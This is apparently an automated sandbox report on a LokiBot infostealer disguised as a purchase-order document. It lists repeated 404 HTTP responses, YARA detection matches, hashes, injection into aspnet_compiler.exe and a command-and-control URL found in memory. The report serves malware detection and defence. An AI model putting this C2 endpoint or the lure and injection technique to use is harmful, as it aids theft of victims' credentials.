            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TYNPQvfEvhcxvWS5VOwyv1yCxKs9S6JEkOwfyx3RjxadntpJv2RzLrlFZRp56wfTzQ2dmLvOX8O9Hv2L%2FvZBIT4sak%2BxLo1vG8eTncdh5iPL6uHT%2BlQlPccAjOMZVA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89990d18c30f8b-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UKak2L11Xor6Cks1pxpaUNVX7%2FG3MWLUmSZSG1rQ1w0JNo1uVK0NRltaH4BAjCkUnG2Y8%2BsWnC%2FiR9eMIYPmoOqeD1Z5NjZ5wYAYxNOcqXJpEuIjPpLGKn8FVhGs%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8999125e44c328-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N4rH88egtgd%2BmdE0RFrzRYFc74p1SlsBf6cIp1oInjThlXgm4WQ5dIGCS28TId35WAASkWcoMynTtj09kEA7fCbc01aa%2BTwWQNkygn4j%2B5zhG%2FjLxGcHceh69tjzjA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8999179cdd1986-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:20:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8r09Fk3GS1KIdlpuUcIu5XLceQyeTbydkjA1Tfayb5YOsfLWEAg0S9sJDQCPI3T4TSHeH2NDY61dqA7fvQ%2Be621zKyBBvBFznmJYmnUIaQwBPYPIh8DCjtrsSRJv7w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89991cc9b9437f-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e4O5SjfyKvTvkcIORLmMnvmUOjGDOBiHXCjmczcCi5SRaa4TwCPstAOVz5AReChb2g5mRllfaNU1j2Y6BHgbfZFf869hVw2cjN8CFbVHN6J9UqY9KxfKQD5D9H9xMg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8999243c61c431-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wMOcjA%2BZD9nEySF8HZ0ApDjYpEAhiuWRxzAwsZU1bdsxiwev9gOZAvYFdH1M4ugHcscx21X4kx5WCGigAmgPBFZ%2FOleLygR2dZqyqKfAbrdHLmHGBKVv2mX2C4YsiA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899929aed28cb9-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AKRZk6oGtDJ3r6yBekAvvzCWk16HaByFAzu%2B34ddDGG00WJYzLZGuBoFI15MddBealgyk9iGU%2BxHbSZRL0J8k1pNTYO%2Fl7Ie1Y0chp%2BhDzXudi0pwngadlF5gizOKg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89992eeffa19bb-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gx99izGIh%2FhPUSzQ%2Fjm5sfY78Uczy4Fz6Lf1JzgS%2BQac3yxT9%2FOGEOIyHNzpwNiD4JKyCwQny9KKaOXuGeX2qBeFPEcSvMXLDdPolbOB77E1inf5LPUPjYz4Gpgp9g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8999354f96c466-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jF2zcAi9NSmA7H3dAbBS6rU3%2BkgNWuFeoUW0k%2BWdj05gubJbynp1jf0jislSiM6aHZPw3pte2MIYWRVvmSEf7HZIYtbozA0pVOJduwF09%2FgLu4kzz9svG67tYfmolQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89993a8ff89e05-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sd027RfBO%2Bcqegf6S%2BUUDd3WfjlqnPGlWJqTSvrIgLryM73VDDSQQ5S%2BkfiCtolVtgTV7cNIe5JVTZESnvhSm%2BL75y6e9%2BnLgGczxDj0ZLUa6V0e2OfFnHTNBN6c7A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8999418e6a443e-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7BwDBx0OK%2BRQJl9nrYcEhkc7BTzDUiSeiQN3VRYoAZK7uY3VGbOSOn2%2B%2FZWpu0rFDTBgYgxD32emXo6nTjV7hz5i1wnxjWYCV7PJEyMhydln1C0ly8Gpd3ePZ5bHFQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8999467c8a41e0-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RDxjuXrvZUxpxuejXKzBOrxjdTX1QpUxXi6abbGz8YhcvWFocTa%2FgBNUKV5gcDTRix75MDTDD%2BY%2Bk5iXku76DeP0UGCp18kgGQmMFufdM5NQS8xT2xNX4EEiyo5ODQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89994b9c0e0f45-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k4jcox0invbQ3ydcBcLmK7s%2FnQZpXOrimvFowBTIPwZO2tcOhf7m%2Bs6Q%2F9rbvWUWNjmrkJO%2BpLvXFNLUC9Rr5ZnX%2Fum4vQFgcZebIrZ52CnRqeF5BdR1T706%2BC8A3w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8999509e1d7d00-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kDcElRujfFU27a2MSEyRLrCXsYnSVPMvJY%2BXltO4vZbvO7W%2Fw5HO%2FS%2FMqBmgEIRf2SJsyd1zQTe%2FMIys%2Bs6sLmEol3wBvcEryW9Tk16gBmb8LUaYGC0QKXnIa3PjsA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899956add0c413-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y53BXyOf9asEuqVE6J%2FMQ3XO%2FKsdUDDHI8UlJSP7cN1yjAbpntEtz1TSYTVoYxrtH2qJ1F751bdWCsXAGqclNloJ21BV683TVNkZNNEg2JBDnaJPWAx%2Bz8jANvN9nQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c899963afd28c99-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4qwXGPoU5sTtXbjCZkY8QdIYtL2TYr1Hb1pVF8qz0lRzW52Qfct0LvFZUxbdYYWfZ%2F3jltHllV9R%2F7QQajJZDUZ3ZmUPxIG%2FAXn8Q3IKuH8nrq6l49CEIpbO7tTEoQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8999692a387c96-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F6MPIsfFruZUhXYken8dVVxkrQSldtml8W3lYv63eRu%2Bwzocz6AQ8xEHTpRnEskMtEYqnVrwDRqgcY7GopvuO%2Bnnkk8rhH1%2Bku3lxqENKGORfKdhi1EtJuhbYjZf9A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c89996e6d718c8a-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 08:21:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKihcROsUu%2FMWQYq23ZOZZHOwdkBYi2BW%2FeoduepUa05Ad68Xoaa8QYaqxouPQGRqSDt%2BlRUP1ApI5B183MAyxbNnRLYDyCVjLo9ZwsauJDMUMaPYTqMn8Z2If5ZPg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8999740fe617d9-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
            Source: aspnet_compiler.exe, 00000002.00000002.2590229710.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.2589893075.00000000004A0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://dddotx.shop/Mine/PWS/fre.php

            System Summary

            barindex
            Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
            Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: Process Memory Space: (PO403810)_VOLEX_doc.exe PID: 6936, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: Process Memory Space: aspnet_compiler.exe PID: 720, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: initial sampleStatic PE information: Filename: (PO403810)_VOLEX_doc.exe
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeCode function: 0_2_017439C00_2_017439C0
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeCode function: 0_2_017440010_2_01744001
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeCode function: 0_2_01743FC30_2_01743FC3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040549C2_2_0040549C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004029D42_2_004029D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0041219C appears 45 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00405B6F appears 42 times
            Source: (PO403810)_VOLEX_doc.exe, 00000000.00000000.1331954900.0000000000C04000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSept10F.exe0 vs (PO403810)_VOLEX_doc.exe
            Source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336296569.00000000040FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs (PO403810)_VOLEX_doc.exe
            Source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1337291123.0000000005470000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBATMAN.dll. vs (PO403810)_VOLEX_doc.exe
            Source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336193818.00000000030C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBATMAN.dll. vs (PO403810)_VOLEX_doc.exe
            Source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1335607654.000000000127E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs (PO403810)_VOLEX_doc.exe
            Source: (PO403810)_VOLEX_doc.exeBinary or memory string: OriginalFilenameSept10F.exe0 vs (PO403810)_VOLEX_doc.exe
            Source: (PO403810)_VOLEX_doc.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
